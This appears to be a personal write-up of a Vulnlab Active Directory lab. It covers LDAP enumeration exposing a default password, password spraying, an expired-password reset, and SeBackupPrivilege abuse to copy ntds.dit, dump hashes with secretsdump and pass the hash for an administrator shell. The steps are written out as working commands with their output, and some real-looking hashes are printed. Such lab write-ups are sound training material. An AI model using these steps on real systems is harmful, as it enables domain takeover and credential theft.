BABY-VULNLAB Notes

Here is my notes on Baby box from Vulnlab.
BABY: 10.10.75.139

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-25 12:52:11Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)

ldapsearch -H ldap://10.10.75.139 -x -W -D "" -b "dc=baby,dc=vl"

[SNIP] 

# Teresa Bell, it, baby.vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Teresa Bell
sn: Bell
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
instanceType: 4
whenCreated: 20211121151108.0Z
whenChanged: 20211121151437.0Z
displayName: Teresa Bell
uSNCreated: 12889
memberOf: CN=it,CN=Users,DC=baby,DC=vl
uSNChanged: 12905
name: Teresa Bell
objectGUID:: EDGXW4JjgEq7+GuyHBu3QQ==
userAccountControl: 66080

[SNIP] 

Found a password ! 

description: Set initial password to BabyStart123!


ldapsearch -x -H ldap://10.10.75.139 -D '' -w '' -b "DC=baby,DC=vl" '(objectClass=person)'  > ldap-people

ldapsearch -x -H ldap://10.10.75.139 -D '' -w '' -b "DC=baby,DC=vl" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}' 

ldapsearch -x -H ldap://10.10.75.139 -D '' -w '' -b "DC=baby,DC=vl" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}' > users.txt


┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# ldapsearch -x -H ldap://10.10.75.139 -D '' -w '' -b "DC=baby,DC=vl" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}'

sAMAccountName
Guest
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson

┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# ldapsearch -x -H ldap://10.10.75.139 -D '' -w '' -b "DC=baby,DC=vl" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}' > users.txt


┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# cat users.txt
sAMAccountName
Guest
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson



445/tcp  open  microsoft-ds?

-Creds spray it with users.txt and that password: BabyStart123!

┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# crackmapexec smb 10.10.75.139 -u users.txt -p 'BabyStart123!'
SMB         10.10.75.139    445    BABYDC           [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\sAMAccountName:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\Guest:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB         10.10.75.139    445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE #Interesting. 

smbpasswd.py Caroline.Robinson:'BabyStart123!'@10.10.75.139 -newpass Password2

smbpasswd.py Caroline.Robinson:'BabyStart123!'@10.10.75.139 -newpass Password2

Impacket v0.11.0 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version
===============================================================================

[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.


Now is Caroline.Robinson:Password2

┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# crackmapexec smb 10.10.75.139 -u Caroline.Robinson -p 'Password2' --shares
SMB         10.10.75.139    445    BABYDC           [*] Windows 10.0 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.75.139    445    BABYDC           [+] baby.vl\Caroline.Robinson:Password2
SMB         10.10.75.139    445    BABYDC           [+] Enumerated shares
SMB         10.10.75.139    445    BABYDC           Share           Permissions     Remark
SMB         10.10.75.139    445    BABYDC           -----           -----------     ------
SMB         10.10.75.139    445    BABYDC           ADMIN$          READ            Remote Admin
SMB         10.10.75.139    445    BABYDC           C$              READ,WRITE      Default share
SMB         10.10.75.139    445    BABYDC           IPC$            READ            Remote IPC
SMB         10.10.75.139    445    BABYDC           NETLOGON        READ            Logon server share
SMB         10.10.75.139    445    BABYDC           SYSVOL          READ            Logon server share

┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# crackmapexec winrm 10.10.75.139 -u Caroline.Robinson -p 'Password2'
SMB         10.10.75.139    5985   BABYDC           [*] Windows 10.0 Build 20348 (name:BABYDC) (domain:baby.vl)
HTTP        10.10.75.139    5985   BABYDC           [*] http://10.10.75.139:5985/wsman
WINRM       10.10.75.139    5985   BABYDC           [+] baby.vl\Caroline.Robinson:Password2 (Pwn3d!)

WINRM USER-SHELL !

464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-10-25T12:52:58+00:00; -54m09s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2024-07-26T09:03:15
|_Not valid after:  2025-01-25T09:03:15
| rdp-ntlm-info:
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-10-25T12:52:18+00:00
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  wsman

┌──(root㉿kali)-[/home/kali/VULNLAB/BABY/10.10.75.139]
└─# crackmapexec winrm 10.10.75.139 -u Caroline.Robinson -p 'Password2'
SMB         10.10.75.139    5985   BABYDC           [*] Windows 10.0 Build 20348 (name:BABYDC) (domain:baby.vl)
HTTP        10.10.75.139    5985   BABYDC           [*] http://10.10.75.139:5985/wsman
WINRM       10.10.75.139    5985   BABYDC           [+] baby.vl\Caroline.Robinson:Password2 (Pwn3d!)

WINRM USER-SHELL !

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami
baby\caroline.robinson
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> hostname
BabyDC
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> dir


    Directory: C:\Users\Caroline.Robinson\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/21/2016   3:36 PM            527 EC2 Feedback.website
-a----         6/21/2016   3:36 PM            554 EC2 Microsoft Windows Guide.website
-a----        11/21/2021   3:24 PM             36 user.txt


*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> type user.txt
[REDIRECTED]

USER.TXT: [REDIRECTED]

PRIV ESC: 

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


SeBackupPrivilege Priv ESC: 

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> dir


    Directory: C:\Users\Caroline.Robinson\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/25/2024   1:15 PM            189 script.txt
-a----        10/25/2024   1:16 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        10/25/2024   1:16 PM          16384 SeBackupPrivilegeUtils.dll


*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> type script.txt
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
diskshadow /s script.txt
Copy-FileSebackupPrivilege e:\Windows\NTDS\ntds.dit C:\Users\Caroline.Robinson\Documents\ntds.dit
reg save hklm\sam C:\Users\Caroline.Robinson\Documents\sam
reg save hklm\system C:\Users\Caroline.Robinson\Documents\system
download ntds.dit
download system
download sam

secretsdump.py -sam sam -system system -ntds ntds.dit LOCAL

secretsdump.py -sam sam -system system -ntds ntds.dit LOCAL

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b[REDIRECTED] - WORKS !
[SNIP]

evil-winrm -i 10.10.75.139 -u administrator -H '[REDIRECTED]'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
baby\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
BabyDC

ADMINISTRATOR SHELL ! 

*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
baby\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> hostname
BabyDC
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/21/2021   3:22 PM             36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]

ROOT.TXT: [REDIRECTED]




9389/tcp  open  adws
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-10-25T12:52:19
|_  start_date: N/A
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
|_clock-skew: mean: -54m09s, deviation: 0s, median: -54m10s
More posts

REDELEGATE-HTB Notes

HERON-VL Notes

DATA-HTB Notes

Where to Start Learning Hacking?
